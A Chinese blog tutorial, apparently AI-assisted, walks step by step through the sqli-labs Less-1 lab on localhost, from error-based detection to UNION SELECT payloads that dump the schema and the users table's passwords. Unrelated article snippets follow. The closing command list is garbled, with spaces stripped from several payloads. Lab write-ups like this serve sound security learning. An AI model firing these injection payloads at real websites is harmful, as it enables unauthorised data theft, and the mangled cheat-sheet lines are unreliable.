news 2026/3/25 2:56:24

sqli-labs-master/Less-1靶场实战解析|包含AI整理

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
sqli-labs-master/Less-1靶场实战解析|包含AI整理

🧪 SQL注入入门:sqli-labs-master/Less-1靶场实战解析

嘿!看到你想学习渗透测试,这太棒了!SQL注入是渗透测试的基础技能之一,sqli-labs-master的Less-1就是个绝佳的入门靶场。我来给你详细讲解这个靶场的渗透过程和思路,帮你轻松入门!

🔍 靶场基本情况

Less-1是一个字符型SQL注入靶场,需要单引号闭合。页面要求我们输入id参数,通过SQL注入获取数据库信息。


🧪 渗透测试全过程(详细步骤)

1️⃣ 判断注入类型(基础判断)

  • 输入http://localhost/sqli-labs-master/Less-1/?id=1

    • ✅ 页面正常显示(说明参数有效)
  • 输入http://localhost/sqli-labs-master/Less-1/?id=1'

    • ❌ 报错:You have an error in your SQL syntax...(单引号未闭合导致语法错误)
  • 输入http://localhost/sqli-labs-master/Less-1/?id=1' --+

    • ✅ 页面正常显示(说明是字符型注入,可用--+注释掉后面的单引号)

💡判断技巧:字符型注入需要单引号闭合,数字型不需要。字符型注入用',数字型用AND 1=1测试。


2️⃣ 确定字段数量(关键步骤)

  • 输入http://localhost/sqli-labs-master/Less-1/?id=1' order by 3 --+

    • ✅ 页面正常(说明至少有3列)
  • 输入http://localhost/sqli-labs-master/Less-1/?id=1' order by 4 --+

    • ❌ 报错:Unknown column '4' in 'order clause'(说明只有3列)

💡为什么用order byorder by可以用来探测字段数量,通过逐步增加数字直到报错确定实际列数。


3️⃣ 确定回显位置(关键位置)

  • 输入http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+
    • ✅ 页面显示:Your Login name:2 Your Password:3
    • 🤔 结论:第2列显示username,第3列显示password

💡为什么用-1id=-1确保原查询无结果,这样联合查询的结果才会显示出来。如果用id=1,原查询有结果,联合查询的数据会被忽略。


4️⃣ 爆破数据库信息

  • 数据库名http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,database(),3 --+

    • ✅ 结果:security(数据库名)
  • 数据库版本http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,version(),3 --+

    • ✅ 结果:10.2.26-MariaDB-log(数据库版本)
  • 当前用户http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,user(),3 --+

    • ✅ 结果:root@localhost(当前数据库用户)

5️⃣ 爆破表名(从information_schema获取)

  • 输入http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    • ✅ 结果:emails,referers,uagents,users(数据库中的表名)

💡关键知识点information_schema是MySQL内置的系统数据库,包含所有元数据。


6️⃣ 爆破字段名(users表的字段)

  • 输入http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
    • ✅ 结果:id,username,password(users表的字段名)

💡为什么用group_concat?因为SQL查询默认返回多行,group_concat将结果聚合为一行显示。


7️⃣ 爆破数据(获取用户名和密码)

  • 输入http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username,'~',password),3 from users --+
    • ✅ 结果:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,...(所有用户名和密码)

💡 核心知识点总结

📌 SQL注入基础

  • 字符型注入:需要单引号闭合(如id=1'
  • 数字型注入:不需要单引号(如id=1 AND 1=1
  • 闭合技巧--+(MySQL中常用注释符,注释掉后面的单引号)

📌 SQL注入常用函数

函数作用示例
database()获取当前数据库名database()
version()获取数据库版本version()
user()获取当前数据库用户user()
group_concat()聚合查询结果为一行group_concat(username, '~', password)
SLEEP()使查询暂停用于时间盲注

📌 MySQL系统数据库

  • information_schema:MySQL内置的系统数据库,包含所有元数据
    • tables表:table_schema(数据库名)、table_name(表名)
    • columns表:column_name(字段名)

📌 联合查询技巧

  • union select:将两个查询结果合并
  • 关键技巧id=-1确保原查询无结果,让联合查询结果显示
  • 字段匹配:联合查询的列数必须与原查询匹配

💪 学习建议

  1. 先理解原理:不要只记命令,要理解为什么需要order byunion select
  2. 动手实践:在自己的环境中搭建sqli-labs靶场,亲自操作
  3. 逐步深入:Less-1是入门,Less-2是数字型注入,Less-3是报错注入,逐步挑战
  4. 安全第一:只在授权的靶场环境中练习,不要尝试攻击他人系统

🌟小提醒:SQL注入是基础技能,但实际渗透中还有更多类型(如盲注、时间盲注、宽字节注入等),建议先掌握Less-1,再挑战其他关卡。


📚 附:Less-1靶场完整SQL命令清单

-- 判断注入类型?id=1' --+ (字符型注入) -- 确定字段数 ?id=1'orderby3--+ (3列正常)?id=1' order by 4 --+ (4列报错) -- 确定回显位置 ?id=-1'unionselect1,2,3--+ (回显位置2、3)-- 爆库名?id=-1' union select 1,database(),3 --+ -- 爆表名 ?id=-1'unionselect1,group_concat(table_name),3frominformation_schema.tableswheretable_schema='security'--+-- 爆字段名?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+ -- 爆数据 ?id=-1'unionselect1,group_concat(username,'~',password),3fromusers--+

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/15 11:15:38

Cmder终极美化指南:5分钟让Windows命令行颜值爆表

Cmder终极美化指南:5分钟让Windows命令行颜值爆表 【免费下载链接】cmder 项目地址: https://gitcode.com/gh_mirrors/cmd/cmder 厌倦了Windows默认的黑白命令行界面?想要一个既美观又实用的终端环境?Cmder作为Windows平台最受欢迎的…

作者头像 李华
网站建设 2026/3/23 3:45:25

VGGT如何重塑三维视觉:从单图理解到多视角重建的技术演进

VGGT如何重塑三维视觉:从单图理解到多视角重建的技术演进 【免费下载链接】vggt VGGT Visual Geometry Grounded Transformer 项目地址: https://gitcode.com/gh_mirrors/vg/vggt 视觉几何基础Transformer(VGGT)正在重新定义三维场景理…

作者头像 李华
网站建设 2026/3/16 23:01:23

mybatis入门案例及解释

2 示例12.1 创建2.1.1 创建项目新建Maven项目,然后直接下一步。展开三角填写信息,最后一行版本不填,直接用默认的。然后完成。进度条走完后,点文件,设置,展开编辑器,在点文件和代码模板。然后先…

作者头像 李华
网站建设 2026/3/15 8:48:13

【血压计算】基于matlab从光电容积脉搏波(PPG)和心电图(ECG)信号中提取的多种特征,推导血压测量值附Matlab代码

✅作者简介:热爱科研的Matlab仿真开发者,擅长数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。 🍎 往期回顾关注个人主页:Matlab科研工作室 🍊个人信条:格物致知,完整Matlab代码获取及仿…

作者头像 李华
网站建设 2026/3/24 12:29:39

学习记录(二十五)-Cursor的pro计划+云服务器使用常识

目录 前言 一、如何跳过Cursor的7天免费计划? 二、升级完成后,出现地区不匹配怎么办? 三、云服务器一些基本常识 总结 前言 感谢同学的资助,在我急需的时候让我用上了Cursor的pro版本。不过记录一下在充值和使用过程中遇到的…

作者头像 李华
网站建设 2026/3/23 22:50:50

代码克隆检测的挑战与AI的机遇

代码克隆检测是软件测试中的重要环节,涉及识别代码库中的相似或重复片段。传统方法如基于文本、令牌或抽象语法树(AST)的匹配,虽有一定效果,但常面临高误报率、难以检测语义克隆(功能相似但结构不同&#x…

作者头像 李华